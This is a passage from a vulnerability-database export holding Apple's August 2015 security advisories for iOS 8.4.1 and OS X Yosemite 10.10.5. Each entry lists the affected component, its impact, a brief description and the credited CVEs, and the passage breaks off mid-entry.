This issue was addressed through improved URL validation.\r\nCVE-ID\r\nCVE-2015-3758 : Brian Simmons of Salesforce, Guillaume Ross\r\n\r\nWebKit\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Visiting a maliciously crafted website may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in WebKit.\r\nThese issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3730 : Apple\r\nCVE-2015-3731 : Apple\r\nCVE-2015-3732 : Apple\r\nCVE-2015-3733 : Apple\r\nCVE-2015-3734 : Apple\r\nCVE-2015-3735 : Apple\r\nCVE-2015-3736 : Apple\r\nCVE-2015-3737 : Apple\r\nCVE-2015-3738 : Apple\r\nCVE-2015-3739 : Apple\r\nCVE-2015-3740 : Apple\r\nCVE-2015-3741 : Apple\r\nCVE-2015-3742 : Apple\r\nCVE-2015-3743 : Apple\r\nCVE-2015-3744 : Apple\r\nCVE-2015-3745 : Apple\r\nCVE-2015-3746 : Apple\r\nCVE-2015-3747 : Apple\r\nCVE-2015-3748 : Apple\r\nCVE-2015-3749 : Apple\r\n\r\nWeb\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Visiting a malicious website may lead to user interface\r\nspoofing\r\nDescription: Navigating to a malformed URL may have allowed a\r\nmalicious website to display an arbitrary URL. This issue was\r\naddressed through improved URL handling.\r\nCVE-ID\r\nCVE-2015-3755 : xisigr of Tencent's Xuanwu Lab\r\n\r\nWebKit\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious website may exfiltrate image data cross-origin\r\nDescription: Images fetched through URLs that redirected to a\r\ndata:image resource could have been exfiltrated cross-origin. 
This\r\nissue was addressed through improved canvas taint tracking.\r\nCVE-ID\r\nCVE-2015-3753 : Antonio Sanso and Damien Antipa of Adobe\r\n\r\nWebKit\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious website can trigger plaintext requests to an\r\norigin under HTTP Strict Transport Security\r\nDescription: An issue existed where Content Security Policy report\r\nrequests would not honor HTTP Strict Transport Security (HSTS). The\r\nissue was addressed by applying HSTS to CSP.\r\nCVE-ID\r\nCVE-2015-3750 : Muneaki Nishimura (nishimunea)\r\n\r\nWebKit\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious website can make a tap event produce a synthetic\r\nclick on another page\r\nDescription: An issue existed in how synthetic clicks are generated\r\nfrom tap events that could cause clicks to target other pages. The\r\nissue was addressed through restricted click propagation.\r\nCVE-ID\r\nCVE-2015-5759 : Phillip Moon and Matt Weston of Sandfield\r\n\r\nWebKit\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Content Security Policy report requests may leak cookies\r\nDescription: Two issues existed in how cookies were added to Content\r\nSecurity Policy report requests. Cookies were sent in cross-origin\r\nreport requests in violation of the standard. Cookies set during\r\nregular browsing were sent in private browsing. 
These issues were\r\naddressed through improved cookie handling.\r\nCVE-ID\r\nCVE-2015-3752 : Muneaki Nishimura (nishimunea)\r\n\r\nWebKit\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Image loading may violate a website's Content Security\r\nPolicy directive\r\nDescription: An issue existed where websites with video controls\r\nwould load images nested in object elements in violation of the\r\nwebsite's Content Security Policy directive. This issue was addressed\r\nthrough improved Content Security Policy enforcement.\r\nCVE-ID\r\nCVE-2015-3751 : Muneaki Nishimura (nishimunea)\r\n\r\n\r\nInstallation note:\r\n\r\nThis update is available through iTunes and Software Update on your\r\niOS device, and will not appear in your computer's Software Update\r\napplication, or in the Apple Downloads site. Make sure you have an\r\nInternet connection and have installed the latest version of iTunes\r\nfrom www.apple.com/itunes/\r\n\r\niTunes and Software Update on the device will automatically check\r\nApple's update server on its weekly schedule. When an update is\r\ndetected, it is downloaded and the option to be installed is\r\npresented to the user when the iOS device is docked. We recommend\r\napplying the update immediately if possible. Selecting Don't Install\r\nwill present the option the next time you connect your iOS device.\r\n\r\nThe automatic update process may take up to a week depending on the\r\nday that iTunes or the device checks for updates. You may manually\r\nobtain the update via the Check for Updates button within iTunes, or\r\nthe Software Update on your device.\r\n\r\nTo check that the iPhone, iPod touch, or iPad has been updated:\r\n\r\n* Navigate to Settings\r\n* Select General\r\n* Select About. 
The version after applying this update\r\nwill be "8.4.1".\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: https://support.apple.com/kb/HT201222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n", "edition": 1, "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "SECURITYVULNS:DOC:32392", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32392", "title": "APPLE-SA-2015-08-13-3 iOS 8.4.1", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:01", "bulletinFamily": "software", "cvelist": ["CVE-2015-5768", "CVE-2015-5600", "CVE-2015-2787", "CVE-2015-5779", "CVE-2013-1775", "CVE-2015-3185", "CVE-2015-3786", "CVE-2015-1792", "CVE-2015-3761", "CVE-2014-7844", "CVE-2015-3781", "CVE-2015-3776", "CVE-2015-2783", "CVE-2015-5748", "CVE-2014-1912", "CVE-2015-5477", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-3762", "CVE-2015-3329", "CVE-2009-5078", "CVE-2015-5754", "CVE-2015-3783", "CVE-2015-3330", "CVE-2014-3613", "CVE-2015-1789", "CVE-2015-3789", "CVE-2014-8150", "CVE-2014-3583", "CVE-2015-3779", "CVE-2015-3788", "CVE-2015-3778", "CVE-2015-0241", "CVE-2013-1776", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3775", "CVE-2013-7338", "CVE-2015-3798", "CVE-2015-5777", "CVE-2015-3765", "CVE-2015-3782", "CVE-2015-0242", "CVE-2015-0253", "CVE-2015-3784", "CVE-2015-3787", "CVE-2015-3799", "CVE-2015-3153", "CVE-2015-3768", "CVE-2015-3760", "CVE-2015-4148", "CVE-2015-5781", "CVE-2015-3805", "CVE-2015-3790", "CVE-2015-5774", "CVE-2015-3792", "CVE-2015-3803", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-5784", "CVE-2015-5751", "CVE-2015-4024", "CVE-2015-3795", "CVE-2015-5750", "CVE-2015-5747", "CVE-2015-4021", "CVE-2015-3144", "CVE-2014-7185", "CVE-2015-5761", "CVE-2013-2777", "CVE-2015-3794", 
"CVE-2015-5773", "CVE-2015-3769", "CVE-2014-3707", "CVE-2015-3800", "CVE-2015-0228", "CVE-2015-3807", "CVE-2015-0244", "CVE-2015-4026", "CVE-2014-8769", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-1788", "CVE-2015-4147", "CVE-2014-8161", "CVE-2012-6685", "CVE-2015-5753", "CVE-2015-3183", "CVE-2015-3772", "CVE-2014-3620", "CVE-2014-9140", "CVE-2013-2776", "CVE-2015-4022", "CVE-2015-3770", "CVE-2015-3777", "CVE-2015-5771", "CVE-2015-5775", "CVE-2015-3780", "CVE-2013-7422", "CVE-2015-5755", "CVE-2015-3145", "CVE-2015-1790", "CVE-2015-5758", "CVE-2014-0106", "CVE-2015-0243", "CVE-2015-3804", "CVE-2015-3773", "CVE-2014-3581", "CVE-2015-3774", "CVE-2015-5782", "CVE-2014-8109", "CVE-2015-5778", "CVE-2013-7040", "CVE-2015-3757", "CVE-2015-3764", "CVE-2015-3143", "CVE-2014-0067", "CVE-2015-5772", "CVE-2015-3791", "CVE-2014-9365", "CVE-2014-8151", "CVE-2015-5757", "CVE-2015-3796", "CVE-2009-5044", "CVE-2015-5783", "CVE-2014-9680", "CVE-2015-5763", "CVE-2014-8767", "CVE-2015-3767", "CVE-2015-3806", "CVE-2015-1791", "CVE-2015-3771", "CVE-2015-3148"], "description": "Over 150 different vulnerabilities in system components and libraries.", "edition": 1, "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "SECURITYVULNS:VULN:14630", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14630", "title": "Apple Mac OS X / OS X Server multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-5768", "CVE-2015-5600", "CVE-2015-2787", "CVE-2015-5779", "CVE-2013-1775", "CVE-2015-3185", "CVE-2015-3786", "CVE-2015-1792", "CVE-2015-3761", "CVE-2014-7844", "CVE-2015-3781", "CVE-2015-3776", "CVE-2015-2783", "CVE-2015-5748", "CVE-2014-1912", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-3762", "CVE-2015-3329", "CVE-2009-5078", "CVE-2015-5754", 
"CVE-2015-3783", "CVE-2015-3330", "CVE-2014-3613", "CVE-2015-1789", "CVE-2015-3789", "CVE-2014-8150", "CVE-2014-3583", "CVE-2015-3779", "CVE-2015-3788", "CVE-2015-3778", "CVE-2015-0241", "CVE-2013-1776", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3775", "CVE-2013-7338", "CVE-2015-3798", "CVE-2015-5777", "CVE-2015-3765", "CVE-2015-3782", "CVE-2015-0242", "CVE-2015-0253", "CVE-2015-3784", "CVE-2015-3787", "CVE-2015-3799", "CVE-2015-3153", "CVE-2015-3768", "CVE-2015-3760", "CVE-2015-4148", "CVE-2015-5781", "CVE-2015-3805", "CVE-2015-3790", "CVE-2015-5774", "CVE-2015-3792", "CVE-2015-3803", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-5784", "CVE-2015-5751", "CVE-2015-4024", "CVE-2015-3795", "CVE-2015-5750", "CVE-2015-5747", "CVE-2015-4021", "CVE-2015-3144", "CVE-2014-7185", "CVE-2015-5761", "CVE-2013-2777", "CVE-2015-3794", "CVE-2015-5773", "CVE-2015-3769", "CVE-2014-3707", "CVE-2015-3800", "CVE-2015-0228", "CVE-2015-3807", "CVE-2015-0244", "CVE-2015-4026", "CVE-2014-8769", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-1788", "CVE-2015-4147", "CVE-2014-8161", "CVE-2012-6685", "CVE-2015-5753", "CVE-2015-3183", "CVE-2015-3772", "CVE-2014-3620", "CVE-2014-9140", "CVE-2013-2776", "CVE-2015-4022", "CVE-2015-3770", "CVE-2015-3777", "CVE-2015-5771", "CVE-2015-5775", "CVE-2015-3780", "CVE-2013-7422", "CVE-2015-5755", "CVE-2015-3145", "CVE-2015-1790", "CVE-2015-5758", "CVE-2014-0106", "CVE-2015-0243", "CVE-2015-3804", "CVE-2015-3773", "CVE-2014-3581", "CVE-2015-3774", "CVE-2015-5782", "CVE-2014-8109", "CVE-2015-5778", "CVE-2013-7040", "CVE-2015-3757", "CVE-2015-3764", "CVE-2015-3143", "CVE-2014-0067", "CVE-2015-5772", "CVE-2015-3791", "CVE-2014-9365", "CVE-2014-8151", "CVE-2015-5757", "CVE-2015-3796", "CVE-2009-5044", "CVE-2015-5783", "CVE-2014-9680", "CVE-2015-5763", "CVE-2014-8767", "CVE-2015-3767", "CVE-2015-3806", "CVE-2015-1791", "CVE-2015-3771", "CVE-2015-3148"], "description": "\r\n\r\nAPPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update\r\n2015-006\r\n\r\nOS 
X Yosemite v10.10.5 and Security Update 2015-006 is now available\r\nand addresses the following:\r\n\r\napache\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in Apache 2.4.16, the most\r\nserious of which may allow a remote attacker to cause a denial of\r\nservice.\r\nDescription: Multiple vulnerabilities existed in Apache versions\r\nprior to 2.4.16. These were addressed by updating Apache to version\r\n2.4.16.\r\nCVE-ID\r\nCVE-2014-3581\r\nCVE-2014-3583\r\nCVE-2014-8109\r\nCVE-2015-0228\r\nCVE-2015-0253\r\nCVE-2015-3183\r\nCVE-2015-3185\r\n\r\napache_mod_php\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in PHP 5.5.20, the most\r\nserious of which may lead to arbitrary code execution.\r\nDescription: Multiple vulnerabilities existed in PHP versions prior\r\nto 5.5.20. These were addressed by updating Apache to version 5.5.27.\r\nCVE-ID\r\nCVE-2015-2783\r\nCVE-2015-2787\r\nCVE-2015-3307\r\nCVE-2015-3329\r\nCVE-2015-3330\r\nCVE-2015-4021\r\nCVE-2015-4022\r\nCVE-2015-4024\r\nCVE-2015-4025\r\nCVE-2015-4026\r\nCVE-2015-4147\r\nCVE-2015-4148\r\n\r\nApple ID OD Plug-in\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to change the password of a\r\nlocal user\r\nDescription: In some circumstances, a state management issue existed\r\nin password authentication. The issue was addressed through improved\r\nstate management.\r\nCVE-ID\r\nCVE-2015-3799 : an anonymous researcher working with HP's Zero Day\r\nInitiative\r\n\r\nAppleGraphicsControl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An issue existed in AppleGraphicsControl which could\r\nhave led to the disclosure of kernel memory layout. 
This issue was\r\naddressed through improved bounds checking.\r\nCVE-ID\r\nCVE-2015-5768 : JieTao Yang of KeenTeam\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in\r\nIOBluetoothHCIController. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3779 : Teddy Reed of Facebook Security\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: A memory management issue could have led to the\r\ndisclosure of kernel memory layout. This issue was addressed with\r\nimproved memory management.\r\nCVE-ID\r\nCVE-2015-3780 : Roberto Paleari and Aristide Fattori of Emaze\r\nNetworks\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious app may be able to access notifications from\r\nother iCloud devices\r\nDescription: An issue existed where a malicious app could access a\r\nBluetooth-paired Mac or iOS device's Notification Center\r\nnotifications via the Apple Notification Center Service. The issue\r\naffected devices using Handoff and logged into the same iCloud\r\naccount. This issue was resolved by revoking access to the Apple\r\nNotification Center Service.\r\nCVE-ID\r\nCVE-2015-3786 : Xiaolong Bai (Tsinghua University), System Security\r\nLab (Indiana University), Tongxin Li (Peking University), XiaoFeng\r\nWang (Indiana University)\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker with privileged network position may be able to\r\nperform denial of service attack using malformed Bluetooth packets\r\nDescription: An input validation issue existed in parsing of\r\nBluetooth ACL packets. 
This issue was addressed through improved\r\ninput validation.\r\nCVE-ID\r\nCVE-2015-3787 : Trend Micro\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local attacker may be able to cause unexpected application\r\ntermination or arbitrary code execution\r\nDescription: Multiple buffer overflow issues existed in blued's\r\nhandling of XPC messages. These issues were addressed through\r\nimproved bounds checking.\r\nCVE-ID\r\nCVE-2015-3777 : mitp0sh of [PDX]\r\n\r\nbootp\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious Wi-Fi network may be able to determine networks\r\na device has previously accessed\r\nDescription: Upon connecting to a Wi-Fi network, iOS may have\r\nbroadcast MAC addresses of previously accessed networks via the DNAv4\r\nprotocol. This issue was addressed through disabling DNAv4 on\r\nunencrypted Wi-Fi networks.\r\nCVE-ID\r\nCVE-2015-3778 : Piers O'Hanlon of Oxford Internet Institute,\r\nUniversity of Oxford (on the EPSRC Being There project)\r\n\r\nCloudKit\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to access the iCloud\r\nuser record of a previously signed in user\r\nDescription: A state inconsistency existed in CloudKit when signing\r\nout users. 
This issue was addressed through improved state handling.\r\nCVE-ID\r\nCVE-2015-3782 : Deepkanwal Plaha of University of Toronto\r\n\r\nCoreMedia Playback\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in CoreMedia Playback.\r\nThese were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5777 : Apple\r\nCVE-2015-5778 : Apple\r\n\r\nCoreText\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5761 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nCoreText\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5755 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\ncurl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities in cURL and libcurl prior to\r\n7.38.0, one of which may allow remote attackers to bypass the Same\r\nOrigin Policy.\r\nDescription: Multiple vulnerabilities existed in cURL and libcurl\r\nprior to 7.38.0. 
These issues were addressed by updating cURL to\r\nversion 7.43.0.\r\nCVE-ID\r\nCVE-2014-3613\r\nCVE-2014-3620\r\nCVE-2014-3707\r\nCVE-2014-8150\r\nCVE-2014-8151\r\nCVE-2015-3143\r\nCVE-2015-3144\r\nCVE-2015-3145\r\nCVE-2015-3148\r\nCVE-2015-3153\r\n\r\nData Detectors Engine\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a sequence of unicode characters can lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in processing of\r\nUnicode characters. These issues were addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-5750 : M1x7e1 of Safeye Team (www.safeye.org)\r\n\r\nDate & Time pref pane\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Applications that rely on system time may have unexpected\r\nbehavior\r\nDescription: An authorization issue existed when modifying the\r\nsystem date and time preferences. This issue was addressed with\r\nadditional authorization checks.\r\nCVE-ID\r\nCVE-2015-3757 : Mark S C Smith\r\n\r\nDictionary Application\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker with a privileged network position may be able\r\nto intercept users' Dictionary app queries\r\nDescription: An issue existed in the Dictionary app, which did not\r\nproperly secure user communications. This issue was addressed by\r\nmoving Dictionary queries to HTTPS.\r\nCVE-ID\r\nCVE-2015-3774 : Jeffrey Paul of EEQJ, Jan Bee of the Google Security\r\nTeam\r\n\r\nDiskImages\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted DMG file may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in parsing of\r\nmalformed DMG images. 
This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3800 : Frank Graziano of the Yahoo Pentest Team\r\n\r\ndyld\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A path validation issue existed in dyld. This was\r\naddressed through improved environment sanitization.\r\nCVE-ID\r\nCVE-2015-3760 : beist of grayhash, Stefan Esser\r\n\r\nFontParser\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-3804 : Apple\r\nCVE-2015-5775 : Apple\r\n\r\nFontParser\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5756 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\ngroff\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple issues in pdfroff\r\nDescription: Multiple issues existed in pdfroff, the most serious of\r\nwhich may allow arbitrary filesystem modification. 
These issues were\r\naddressed by removing pdfroff.\r\nCVE-ID\r\nCVE-2009-5044\r\nCVE-2009-5078\r\n\r\nImageIO\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nTIFF images. This issue was addressed through improved bounds\r\nchecking.\r\nCVE-ID\r\nCVE-2015-5758 : Apple\r\n\r\nImageIO\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Visiting a maliciously crafted website may result in the\r\ndisclosure of process memory\r\nDescription: An uninitialized memory access issue existed in\r\nImageIO's handling of PNG and TIFF images. Visiting a malicious\r\nwebsite may result in sending data from process memory to the\r\nwebsite. This issue is addressed through improved memory\r\ninitialization and additional validation of PNG and TIFF images.\r\nCVE-ID\r\nCVE-2015-5781 : Michal Zalewski\r\nCVE-2015-5782 : Michal Zalewski\r\n\r\nInstall Framework Legacy\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with root privileges\r\nDescription: An issue existed in how Install.framework's 'runner'\r\nbinary dropped privileges. This issue was addressed through improved\r\nprivilege management.\r\nCVE-ID\r\nCVE-2015-5784 : Ian Beer of Google Project Zero\r\n\r\nInstall Framework Legacy\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A race condition existed in\r\nInstall.framework's 'runner' binary that resulted in\r\nprivileges being incorrectly dropped. 
This issue was addressed\r\nthrough improved object locking.\r\nCVE-ID\r\nCVE-2015-5754 : Ian Beer of Google Project Zero\r\n\r\nIOFireWireFamily\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: Memory corruption issues existed in IOFireWireFamily.\r\nThese issues were addressed through additional type input validation.\r\nCVE-ID\r\nCVE-2015-3769 : Ilja van Sprundel\r\nCVE-2015-3771 : Ilja van Sprundel\r\nCVE-2015-3772 : Ilja van Sprundel\r\n\r\nIOGraphics\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in IOGraphics. This\r\nissue was addressed through additional type input validation.\r\nCVE-ID\r\nCVE-2015-3770 : Ilja van Sprundel\r\nCVE-2015-5783 : Ilja van Sprundel\r\n\r\nIOHIDFamily\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A buffer overflow issue existed in IOHIDFamily. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5774 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An issue existed in the mach_port_space_info interface,\r\nwhich could have led to the disclosure of kernel memory layout. This\r\nwas addressed by disabling the mach_port_space_info interface.\r\nCVE-ID\r\nCVE-2015-3766 : Cererdlong of Alibaba Mobile Security Team,\r\n@PanguTeam\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: An integer overflow existed in the handling of IOKit\r\nfunctions. 
This issue was addressed through improved validation of\r\nIOKit API arguments.\r\nCVE-ID\r\nCVE-2015-3768 : Ilja van Sprundel\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to cause a system denial of service\r\nDescription: A resource exhaustion issue existed in the fasttrap\r\ndriver. This was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5747 : Maxime VILLARD of m00nbsd\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to cause a system denial of service\r\nDescription: A validation issue existed in the mounting of HFS\r\nvolumes. This was addressed by adding additional checks.\r\nCVE-ID\r\nCVE-2015-5748 : Maxime VILLARD of m00nbsd\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute unsigned code\r\nDescription: An issue existed that allowed unsigned code to be\r\nappended to signed code in a specially crafted executable file. This\r\nissue was addressed through improved code signature validation.\r\nCVE-ID\r\nCVE-2015-3806 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A specially crafted executable file could allow unsigned,\r\nmalicious code to execute\r\nDescription: An issue existed in the way multi-architecture\r\nexecutable files were evaluated that could have allowed unsigned code\r\nto be executed. This issue was addressed through improved validation\r\nof executable files.\r\nCVE-ID\r\nCVE-2015-3803 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute unsigned code\r\nDescription: A validation issue existed in the handling of Mach-O\r\nfiles. 
This was addressed by adding additional checks.\r\nCVE-ID\r\nCVE-2015-3802 : TaiG Jailbreak Team\r\nCVE-2015-3805 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted plist may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption existed in processing of malformed\r\nplists. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3776 : Teddy Reed of Facebook Security, Patrick Stein\r\n(@jollyjinx) of Jinx Germany\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A path validation issue existed. This was addressed\r\nthrough improved environment sanitization.\r\nCVE-ID\r\nCVE-2015-3761 : Apple\r\n\r\nLibc\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted regular expression may lead\r\nto an unexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in the TRE library.\r\nThese were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3796 : Ian Beer of Google Project Zero\r\nCVE-2015-3797 : Ian Beer of Google Project Zero\r\nCVE-2015-3798 : Ian Beer of Google Project Zero\r\n\r\nLibinfo\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in handling AF_INET6\r\nsockets. 
These were addressed by improved memory handling.\r\nCVE-ID\r\nCVE-2015-5776 : Apple\r\n\r\nlibpthread\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling syscalls.\r\nThis issue was addressed through improved lock state checking.\r\nCVE-ID\r\nCVE-2015-5757 : Lufeng Li of Qihoo 360\r\n\r\nlibxml2\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in libxml2 versions prior\r\nto 2.9.2, the most serious of which may allow a remote attacker to\r\ncause a denial of service\r\nDescription: Multiple vulnerabilities existed in libxml2 versions\r\nprior to 2.9.2. These were addressed by updating libxml2 to version\r\n2.9.2.\r\nCVE-ID\r\nCVE-2012-6685 : Felix Groebert of Google\r\nCVE-2014-0191 : Felix Groebert of Google\r\n\r\nlibxml2\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML document may lead to\r\ndisclosure of user information\r\nDescription: A memory access issue existed in libxml2. This was\r\naddressed by improved memory handling\r\nCVE-ID\r\nCVE-2014-3660 : Felix Groebert of Google\r\n\r\nlibxml2\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a 